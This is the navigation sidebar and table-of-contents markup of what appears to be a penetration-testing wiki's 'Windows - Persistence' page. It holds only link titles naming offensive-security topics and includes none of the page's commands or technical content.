<a href="../../../cloud/aws/aws-metadata/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Metadata SSRF
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/aws/aws-s3-bucket/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Service - S3 Buckets
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/aws/aws-ssm/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Service - SSM
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/aws/aws-training/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Training
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4_2" >
<label class="md-nav__link" for="__nav_4_2" id="__nav_4_2_label" tabindex="0">
<span class="md-ellipsis">
Azure
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_4_2_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_4_2">
<span class="md-nav__icon md-icon"></span>
Azure
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../../cloud/azure/aka-ms/" class="md-nav__link">
<span class="md-ellipsis">
aka.ms Shortcuts
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/azure/azure-access-and-token/" class="md-nav__link">
<span class="md-ellipsis">
Azure AD - Access and Tokens
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/azure/azure-ad-conditional-access-policy/" class="md-nav__link">
<span class="md-ellipsis">
Azure AD - Conditional Access Policy
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/azure/azure-ad-connect/" class="md-nav__link">
<span class="md-ellipsis">
Azure AD - AD Connect and Cloud Sync
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/azure/azure-devices-users-sp/" class="md-nav__link">
<span class="md-ellipsis">
Azure AD - IAM
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/azure/azure-enumeration/" class="md-nav__link">
<span class="md-ellipsis">
Azure AD - Enumerate
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/azure/azure-persistence/" class="md-nav__link">
<span class="md-ellipsis">
Azure AD - Persistence
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/azure/azure-phishing/" class="md-nav__link">
<span class="md-ellipsis">
Azure AD - Phishing
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/azure/azure-requirements/" class="md-nav__link">
<span class="md-ellipsis">
Azure - Requirements
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/azure/azure-services-application-endpoint/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Application Endpoint
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/azure/azure-services-application-proxy/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Application Proxy
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/azure/azure-services-container-registry/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Container Registry
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/azure/azure-services-deployment-template/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Deployment Template
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/azure/azure-services-devops/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Azure DevOps
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/azure/azure-services-keyvault/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - KeyVault
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/azure/azure-services-microsoft-intune/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Microsoft Intune
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/azure/azure-services-office-365/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Office 365
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/azure/azure-services-runbook/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Runbook and Automation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/azure/azure-services-storage-blob/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Storage Blob
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/azure/azure-services-virtual-machine/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Virtual Machine
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/azure/azure-services-web-apps/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Web Apps
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/azure/azure-services-web-domains/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - DNS Suffix
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4_3" >
<label class="md-nav__link" for="__nav_4_3" id="__nav_4_3_label" tabindex="0">
<span class="md-ellipsis">
Ibm
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_4_3_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_4_3">
<span class="md-nav__icon md-icon"></span>
Ibm
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../../cloud/ibm/ibm-cloud-databases/" class="md-nav__link">
<span class="md-ellipsis">
IBM Cloud Managed Database Services
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/ibm/ibm-cloud-object-storage/" class="md-nav__link">
<span class="md-ellipsis">
IBM Cloud Object Storage
</span>
</a>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_5" >
<label class="md-nav__link" for="__nav_5" id="__nav_5_label" tabindex="0">
<span class="md-ellipsis">
Command control
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_5_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_5">
<span class="md-nav__icon md-icon"></span>
Command control
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../../command-control/cobalt-strike-beacons/" class="md-nav__link">
<span class="md-ellipsis">
Cobalt Strike - Beacons
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../command-control/cobalt-strike-kits/" class="md-nav__link">
<span class="md-ellipsis">
Cobalt Strike - Kits
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../command-control/cobalt-strike/" class="md-nav__link">
<span class="md-ellipsis">
Cobalt Strike
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../command-control/metasploit/" class="md-nav__link">
<span class="md-ellipsis">
Metasploit
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_6" >
<label class="md-nav__link" for="__nav_6" id="__nav_6_label" tabindex="0">
<span class="md-ellipsis">
Containers
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_6_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_6">
<span class="md-nav__icon md-icon"></span>
Containers
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../../containers/docker/" class="md-nav__link">
<span class="md-ellipsis">
Docker
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../containers/kubernetes/" class="md-nav__link">
<span class="md-ellipsis">
Kubernetes
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_7" >
<label class="md-nav__link" for="__nav_7" id="__nav_7_label" tabindex="0">
<span class="md-ellipsis">
Databases
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_7_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_7">
<span class="md-nav__icon md-icon"></span>
Databases
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../../databases/mssql-audit-checks/" class="md-nav__link">
<span class="md-ellipsis">
MSSQL - Audit Checks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../databases/mssql-command-execution/" class="md-nav__link">
<span class="md-ellipsis">
MSSQL - Command Execution
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../databases/mssql-credentials/" class="md-nav__link">
<span class="md-ellipsis">
MSSQL - Credentials
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../databases/mssql-enumeration/" class="md-nav__link">
<span class="md-ellipsis">
MSSQL - Database Enumeration
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../databases/mssql-linked-database/" class="md-nav__link">
<span class="md-ellipsis">
MSSQL - Linked Database
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_8" >
<label class="md-nav__link" for="__nav_8" id="__nav_8_label" tabindex="0">
<span class="md-ellipsis">
Devops
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_8_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_8">
<span class="md-nav__icon md-icon"></span>
Devops
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../../devops/" class="md-nav__link">
<span class="md-ellipsis">
CI/CD attacks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../devops/azure-devops/" class="md-nav__link">
<span class="md-ellipsis">
Azure DevOps
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../devops/buildkite/" class="md-nav__link">
<span class="md-ellipsis">
BuildKite
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../devops/circle-ci/" class="md-nav__link">
<span class="md-ellipsis">
CircleCI
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../devops/drone-ci/" class="md-nav__link">
<span class="md-ellipsis">
Drone CI
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../devops/github-actions/" class="md-nav__link">
<span class="md-ellipsis">
GitHub Actions
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_9" >
<label class="md-nav__link" for="__nav_9" id="__nav_9_label" tabindex="0">
<span class="md-ellipsis">
Methodology
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_9_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_9">
<span class="md-nav__icon md-icon"></span>
Methodology
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../../methodology/android-applications/" class="md-nav__link">
<span class="md-ellipsis">
Android Application
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../methodology/bug-hunting-methodology/" class="md-nav__link">
<span class="md-ellipsis">
Bug Hunting Methodology
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../methodology/source-code-analysis/" class="md-nav__link">
<span class="md-ellipsis">
Source Code Analysis
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../methodology/vulnerability-reports/" class="md-nav__link">
<span class="md-ellipsis">
Vulnerability Reports
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--active md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_10" checked>
<label class="md-nav__link" for="__nav_10" id="__nav_10_label" tabindex="0">
<span class="md-ellipsis">
Redteam
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_10_label" aria-expanded="true">
<label class="md-nav__title" for="__nav_10">
<span class="md-nav__icon md-icon"></span>
Redteam
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_10_1" >
<label class="md-nav__link" for="__nav_10_1" id="__nav_10_1_label" tabindex="0">
<span class="md-ellipsis">
Access
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_10_1_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_10_1">
<span class="md-nav__icon md-icon"></span>
Access
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../access/html-smuggling/" class="md-nav__link">
<span class="md-ellipsis">
HTML Smuggling
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../access/initial-access/" class="md-nav__link">
<span class="md-ellipsis">
Initial Access
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../access/office-attacks/" class="md-nav__link">
<span class="md-ellipsis">
Office - Attacks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../access/phishing/" class="md-nav__link">
<span class="md-ellipsis">
Phishing
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../access/web-attack-surface/" class="md-nav__link">
<span class="md-ellipsis">
Web Attack Surface
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../access/windows-download-execute/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Download and execute methods
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../access/windows-using-credentials/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Using credentials
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_10_2" >
<label class="md-nav__link" for="__nav_10_2" id="__nav_10_2_label" tabindex="0">
<span class="md-ellipsis">
Escalation
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_10_2_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_10_2">
<span class="md-nav__icon md-icon"></span>
Escalation
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../escalation/linux-privilege-escalation/" class="md-nav__link">
<span class="md-ellipsis">
Linux - Privilege Escalation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../escalation/windows-privilege-escalation/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Privilege Escalation
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_10_3" >
<label class="md-nav__link" for="__nav_10_3" id="__nav_10_3_label" tabindex="0">
<span class="md-ellipsis">
Evasion
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_10_3_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_10_3">
<span class="md-nav__icon md-icon"></span>
Evasion
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../evasion/edr-bypass/" class="md-nav__link">
<span class="md-ellipsis">
Endpoint Detection and Response
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../evasion/elastic-edr/" class="md-nav__link">
<span class="md-ellipsis">
Elastic EDR
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../evasion/linux-evasion/" class="md-nav__link">
<span class="md-ellipsis">
Linux - Evasion
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../evasion/windows-amsi-bypass/" class="md-nav__link">
<span class="md-ellipsis">
Windows - AMSI Bypass
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../evasion/windows-defenses/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Defenses
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../evasion/windows-dpapi/" class="md-nav__link">
<span class="md-ellipsis">
Windows - DPAPI
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--active md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_10_4" checked>
<label class="md-nav__link" for="__nav_10_4" id="__nav_10_4_label" tabindex="0">
<span class="md-ellipsis">
Persistence
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_10_4_label" aria-expanded="true">
<label class="md-nav__title" for="__nav_10_4">
<span class="md-nav__icon md-icon"></span>
Persistence
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../linux-persistence/" class="md-nav__link">
<span class="md-ellipsis">
Linux - Persistence
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../rdp-persistence/" class="md-nav__link">
<span class="md-ellipsis">
RDP - Persistence
</span>
</a>
</li>
<li class="md-nav__item md-nav__item--active">
<input class="md-nav__toggle md-toggle" type="checkbox" id="__toc">
<label class="md-nav__link md-nav__link--active" for="__toc">
<span class="md-ellipsis">
Windows - Persistence
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<a href="./" class="md-nav__link md-nav__link--active">
<span class="md-ellipsis">
Windows - Persistence
</span>
</a>
<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
<label class="md-nav__title" for="__toc">
<span class="md-nav__icon md-icon"></span>
Table of contents
</label>
<ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
<li class="md-nav__item">
<a href="#summary" class="md-nav__link">
<span class="md-ellipsis">
Summary
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#tools" class="md-nav__link">
<span class="md-ellipsis">
Tools
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#hide-your-binary" class="md-nav__link">
<span class="md-ellipsis">
Hide Your Binary
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#disable-antivirus-and-security" class="md-nav__link">
<span class="md-ellipsis">
Disable Antivirus and Security
</span>
</a>
<nav class="md-nav" aria-label="Disable Antivirus and Security">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#antivirus-removal" class="md-nav__link">
<span class="md-ellipsis">
Antivirus Removal
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#disable-windows-defender" class="md-nav__link">
<span class="md-ellipsis">
Disable Windows Defender
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#disable-windows-firewall" class="md-nav__link">
<span class="md-ellipsis">
Disable Windows Firewall
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#clear-system-and-security-logs" class="md-nav__link">
<span class="md-ellipsis">
Clear System and Security Logs
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#simple-user" class="md-nav__link">
<span class="md-ellipsis">
Simple User
</span>
</a>
<nav class="md-nav" aria-label="Simple User">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#registry-hkcu" class="md-nav__link">
<span class="md-ellipsis">
Registry HKCU
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#startup" class="md-nav__link">
<span class="md-ellipsis">
Startup
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#scheduled-tasks-user" class="md-nav__link">
<span class="md-ellipsis">
Scheduled Tasks User
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bits-jobs" class="md-nav__link">
<span class="md-ellipsis">
BITS Jobs
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#serviceland" class="md-nav__link">
<span class="md-ellipsis">
Serviceland
</span>
</a>
<nav class="md-nav" aria-label="Serviceland">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#iis" class="md-nav__link">
<span class="md-ellipsis">
IIS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#windows-service" class="md-nav__link">
<span class="md-ellipsis">
Windows Service
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#elevated" class="md-nav__link">
<span class="md-ellipsis">
Elevated
</span>
</a>
<nav class="md-nav" aria-label="Elevated">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#registry-hklm" class="md-nav__link">
<span class="md-ellipsis">
Registry HKLM
</span>
</a>
<nav class="md-nav" aria-label="Registry HKLM">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#winlogon-helper-dll" class="md-nav__link">
<span class="md-ellipsis">
Winlogon Helper DLL
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#globalflag" class="md-nav__link">
<span class="md-ellipsis">
GlobalFlag
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#startup-elevated" class="md-nav__link">
<span class="md-ellipsis">
Startup Elevated
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#services-elevated" class="md-nav__link">
<span class="md-ellipsis">
Services Elevated
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#servicesecuritydescriptor" class="md-nav__link">
<span class="md-ellipsis">
ServiceSecurityDescriptor
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#scheduled-tasks-elevated" class="md-nav__link">
<span class="md-ellipsis">
Scheduled Tasks Elevated
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#windows-management-instrumentation-event-subscription" class="md-nav__link">
<span class="md-ellipsis">
Windows Management Instrumentation Event Subscription
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#binary-replacement" class="md-nav__link">
<span class="md-ellipsis">
Binary Replacement
</span>
</a>
<nav class="md-nav" aria-label="Binary Replacement">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#binary-replacement-on-windows-xp" class="md-nav__link">
<span class="md-ellipsis">
Binary Replacement on Windows XP+
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#binary-replacement-on-windows-10" class="md-nav__link">
<span class="md-ellipsis">
Binary Replacement on Windows 10+
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#skeleton-key" class="md-nav__link">
<span class="md-ellipsis">
Skeleton Key
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#virtual-machines" class="md-nav__link">
<span class="md-ellipsis">
Virtual Machines
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#windows-subsystem-for-linux" class="md-nav__link">
<span class="md-ellipsis">
Windows Subsystem for Linux
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#domain" class="md-nav__link">
<span class="md-ellipsis">
Domain
</span>
</a>
<nav class="md-nav" aria-label="Domain">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#user-certificate" class="md-nav__link">
<span class="md-ellipsis">
User Certificate
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#golden-certificate" class="md-nav__link">
<span class="md-ellipsis">
Golden Certificate
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#golden-ticket" class="md-nav__link">
<span class="md-ellipsis">
Golden Ticket
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#laps-persistence" class="md-nav__link">
<span class="md-ellipsis">
LAPS Persistence
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#references" class="md-nav__link">
<span class="md-ellipsis">
References
</span>
</a>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_10_5" >
<label class="md-nav__link" for="__nav_10_5" id="__nav_10_5_label" tabindex="0">
<span class="md-ellipsis">
Pivoting
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_10_5_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_10_5">
<span class="md-nav__icon md-icon"></span>
Pivoting
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../pivoting/network-pivoting-techniques/" class="md-nav__link">
<span class="md-ellipsis">
Network Pivoting Techniques
</span>
</a>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</div>
</div>
</div>
<div class="md-sidebar md-sidebar--secondary" data-md-component="sidebar" data-md-type="toc" >
<div class="md-sidebar__scrollwrap">
<div class="md-sidebar__inner">
<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
<label class="md-nav__title" for="__toc">
<span class="md-nav__icon md-icon"></span>
Table of contents
</label>
<ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
<li class="md-nav__item">
<a href="#summary" class="md-nav__link">
<span class="md-ellipsis">
Summary
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#tools" class="md-nav__link">
<span class="md-ellipsis">
Tools
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#hide-your-binary" class="md-nav__link">
<span class="md-ellipsis">
Hide Your Binary
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#disable-antivirus-and-security" class="md-nav__link">
<span class="md-ellipsis">
Disable Antivirus and Security
</span>
</a>
<nav class="md-nav" aria-label="Disable Antivirus and Security">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#antivirus-removal" class="md-nav__link">
<span class="md-ellipsis">
Antivirus Removal
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#disable-windows-defender" class="md-nav__link">
<span class="md-ellipsis">
Disable Windows Defender
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#disable-windows-firewall" class="md-nav__link">
<span class="md-ellipsis">
Disable Windows Firewall
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#clear-system-and-security-logs" class="md-nav__link">
<span class="md-ellipsis">
Clear System and Security Logs
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#simple-user" class="md-nav__link">
<span class="md-ellipsis">
Simple User
</span>
</a>
<nav class="md-nav" aria-label="Simple User">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#registry-hkcu" class="md-nav__link">
<span class="md-ellipsis">
Registry HKCU
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#startup" class="md-nav__link">
<span class="md-ellipsis">
Startup
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#scheduled-tasks-user" class="md-nav__link">
<span class="md-ellipsis">
Scheduled Tasks User
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bits-jobs" class="md-nav__link">
<span class="md-ellipsis">
BITS Jobs
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#serviceland" class="md-nav__link">
<span class="md-ellipsis">
Serviceland
</span>
</a>
<nav class="md-nav" aria-label="Serviceland">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#iis" class="md-nav__link">
<span class="md-ellipsis">
IIS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#windows-service" class="md-nav__link">
<span class="md-ellipsis">
Windows Service
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#elevated" class="md-nav__link">
<span class="md-ellipsis">
Elevated
</span>
</a>
<nav class="md-nav" aria-label="Elevated">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#registry-hklm" class="md-nav__link">
<span class="md-ellipsis">
Registry HKLM
</span>
</a>
<nav class="md-nav" aria-label="Registry HKLM">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#winlogon-helper-dll" class="md-nav__link">
<span class="md-ellipsis">
Winlogon Helper DLL
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#globalflag" class="md-nav__link">
<span class="md-ellipsis">
GlobalFlag
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#startup-elevated" class="md-nav__link">
<span class="md-ellipsis">
Startup Elevated
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#services-elevated" class="md-nav__link">
<span class="md-ellipsis">
Services Elevated
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#servicesecuritydescriptor" class="md-nav__link">
<span class="md-ellipsis">
ServiceSecurityDescriptor
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#scheduled-tasks-elevated" class="md-nav__link">
<span class="md-ellipsis">
Scheduled Tasks Elevated
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#windows-management-instrumentation-event-subscription" class="md-nav__link">
<span class="md-ellipsis">
Windows Management Instrumentation Event Subscription
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#binary-replacement" class="md-nav__link">
<span class="md-ellipsis">
Binary Replacement
</span>
</a>
<nav class="md-nav" aria-label="Binary Replacement">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#binary-replacement-on-windows-xp" class="md-nav__link">
<span class="md-ellipsis">
Binary Replacement on Windows XP+
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#binary-replacement-on-windows-10" class="md-nav__link">
<span class="md-ellipsis">
Binary Replacement on Windows 10+
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#skeleton-key" class="md-nav__link">
<span class="md-ellipsis">
Skeleton Key
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#virtual-machines" class="md-nav__link">
<span class="md-ellipsis">
Virtual Machines
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#windows-subsystem-for-linux" class="md-nav__link">
<span class="md-ellipsis">
Windows Subsystem for Linux
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#domain" class="md-nav__link">
<span class="md-ellipsis">
Domain
</span>
</a>
<nav class="md-nav" aria-label="Domain">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#user-certificate" class="md-nav__link">
<span class="md-ellipsis">
User Certificate
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#golden-certificate" class="md-nav__link">
<span class="md-ellipsis">
Golden Certificate
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#golden-ticket" class="md-nav__link">
<span class="md-ellipsis">
Golden Ticket
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#laps-persistence" class="md-nav__link">
<span class="md-ellipsis">
